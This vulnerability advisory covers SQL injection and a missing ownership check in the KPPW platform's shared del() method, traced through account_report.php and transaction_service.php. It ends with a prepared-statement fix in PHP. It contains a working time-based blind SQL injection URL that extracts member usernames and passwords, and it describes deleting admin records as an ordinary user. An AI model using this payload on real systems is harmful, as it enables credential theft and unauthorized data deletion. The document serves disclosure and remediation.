KPPW latest version SQL injection vulnerability 4 (multiple injection points and an authorization bypass caused by the same problem)
File: /control/user/account_report.php
    $objReportT = keke_table_class::get_instance('witkey_report');
    if (isset($action)) {
        switch ($action) {
            case 'mulitDel':
                if ($ckb) {
                    // $ckb comes straight from the request; $objTaskT is never initialised in this file (see below)
                    $objTaskT->del('task_id', $ckb);
                    kekezu::show_msg('Deleted successfully', $strUrl, NULL, NULL, 'ok');
                } else {
                    kekezu::show_msg('Deletion failed', NULL, 'error');
                }
                break;
            // ...
        }
    }
In $objTaskT->del('task_id', $ckb); the request parameter $ckb is passed into the del() method.
Following del() into /lib/inc/keke_table_class.php:
    function del($pk, $val, $url = null) {
        if (!$val) {
            return false;
        }
        if (is_array($val) && !empty($val)) {
            // array of ids: joined with commas, each element used unfiltered
            $ids = implode(',', $val);
            $this->_table_obj->setWhere("$pk in ($ids)");
        } elseif ($val) {
            // scalar id: concatenated directly, no intval() and no quoting
            $this->_table_obj->setWhere("$pk = " . $val);
        }
        $del_query = "del_" . $this->_pre . $this->_table_name;
        return $this->_table_obj->$del_query();
    }
Here $val is simply the $ckb value from the request.
When $val is non-empty and not an array, it is concatenated straight into the WHERE clause. Nothing casts it to an integer or wraps it in quotes, so the caller controls the rest of the SQL statement: SQL injection. (The array branch has the same problem: implode() joins the elements without filtering them.)
Note a bug in this particular file: del() is a method of keke_table_class (/lib/inc/keke_table_class.php), and account_report.php instantiates it as $objReportT = keke_table_class::get_instance('witkey_report'), but the call is made on $objTaskT, which is never initialised. So del() cannot actually be reached from account_report.php.
The same issue exists in /control/user/account_rights.php.
Because del() is a shared method of keke_table_class in /lib/inc/keke_table_class.php, it is called from many places.
The admin back-end call sites are not covered here (back-end vulnerabilities really get no attention from anyone...).
On the front-end there are more than 20 call sites across different files.
Some of them filter the input; others do not, including:
/control/user/message_detail.php
/control/user/message_notice.php
/control/user/message_private.php
/control/user/shop_caselist.php
/control/user/transaction_released.php
/control/user/transaction_service.php
Here /control/user/transaction_service.php is used as the example:
    $strModelName = $kekezu->_model_list[$intModelId]['model_code'];
    $arrStatus = call_user_func(array($strModelName . '_shop_class', 'get_' . $strModelName . '_status'));
    $objServiceT = keke_table_class::get_instance('witkey_service');
    if (isset($action)) {
        switch ($action) {
            case 'mulitDel':
                if ($ckb) {
                    // $ckb comes straight from the request and reaches setWhere() unfiltered
                    $objServiceT->del('service_id', $ckb);
                    kekezu::show_msg('Deleted successfully', $strUrl, NULL, NULL, 'ok');
                } else {
                    kekezu::show_msg('Deletion failed', NULL, 'error');
                }
                break;
            // ...
        }
    }
This is injectable in exactly the same way.
Secondly, when deleting the various kinds of data, the record is deleted by its id alone; the code never checks which user owns it. That is an authorization bypass:
any logged-in user can delete content that belongs to any other user.
Here, for example, the services and other data created by the administrator can be deleted by an ordinary user.
SQL injection:
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=service&action=mulitDel&ckb=1161 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)
Checking the SQL execution result: the response comes back after a 5-second delay, which means the if() condition was true,
so the first character of username+password for the first row of keke_witkey_member is 'a' (char(97)). Stepping the mid() offset and the compared character extracts the rest one character at a time.
The ckb here is the service_id of the service module.
service_id 1161 is a service created by the admin user, and a plain request with ckb=1161 deletes it all the same, which is the authorization bypass.
Solution:
Cast the id with intval() (each element separately when $ckb is an array), or wrap the value in single quotes with proper escaping, before it reaches setWhere(). In addition, check that the record belongs to the current user before deleting it, which also closes the authorization bypass.
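As an added example of the fix described above (this is not KPPW's own code), the following replacement for the del() pattern validates every id as a positive integer, binds the ids as prepared-statement parameters instead of concatenating them, and restricts the DELETE to rows owned by the current user. The PDO connection, the `uid` owner column and the $currentUserId variable are assumptions made for the illustration, not facts about KPPW's schema; the demo at the bottom runs on an in-memory SQLite table constructed here.

```php
<?php
// Added example, not KPPW code. Assumes PDO and an owner column named `uid`.

/**
 * Delete rows of $table whose $pk is in $val, but only rows owned by $ownerId.
 * $table and $pk are identifiers chosen by the code, never by the request.
 */
function safe_del(PDO $pdo, string $table, string $pk, $val, int $ownerId): int
{
    // Identifiers are concatenated into SQL, so restrict them to plain names.
    foreach ([$table, $pk] as $ident) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $ident)) {
            throw new InvalidArgumentException("bad identifier: $ident");
        }
    }

    // Accept a single id or an array of ids (ckb=... or ckb[]=...).
    // Every element must be a positive integer: this is the intval() step,
    // applied to the array branch as well, where implode() used to pass
    // each element through unfiltered.
    $ids = [];
    foreach ((array) $val as $v) {
        if (!is_scalar($v) || !ctype_digit((string) $v) || (int) $v < 1) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $ids[] = (int) $v;
    }
    if ($ids === []) {
        return 0;
    }

    // One placeholder per id: the values travel as bound parameters, not as
    // text inside the WHERE clause. The owner check closes the IDOR.
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $sql   = "DELETE FROM `$table` WHERE `$pk` IN ($marks) AND `uid` = ?";
    $stmt  = $pdo->prepare($sql);
    $stmt->execute(array_merge($ids, [$ownerId]));
    return $stmt->rowCount();   // number of rows actually removed
}

// Constructed demo data on an in-memory SQLite database (assumed layout).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE keke_witkey_service (service_id INTEGER PRIMARY KEY, uid INTEGER, title TEXT)');
$pdo->exec("INSERT INTO keke_witkey_service VALUES (1161, 1, 'admin service'), (1162, 7, 'user service')");

$currentUserId = 7;   // assumed: id of the logged-in user (uid 1 is the admin here)

// The advisory's time-based payload never reaches the database: it is rejected
// before any SQL is built.
try {
    safe_del($pdo, 'keke_witkey_service', 'service_id',
             '1161 and 1=if(mid((select 1),1,1)=char(97),sleep(5),2)', $currentUserId);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Call-site equivalent of the mulitDel branch in transaction_service.php.
// User 7 asks to delete both services; only their own row (1162) goes away,
// the admin's 1161 is left untouched.
$deleted = safe_del($pdo, 'keke_witkey_service', 'service_id', [1161, 1162], $currentUserId);
echo "deleted rows: $deleted\n";
```

In the call site, the returned row count can drive the success/failure message instead of the unconditional "Deleted successfully": a count of 0 for a non-empty id list means the ids existed but were not the caller's, which is worth logging as an attempted unauthorized deletion.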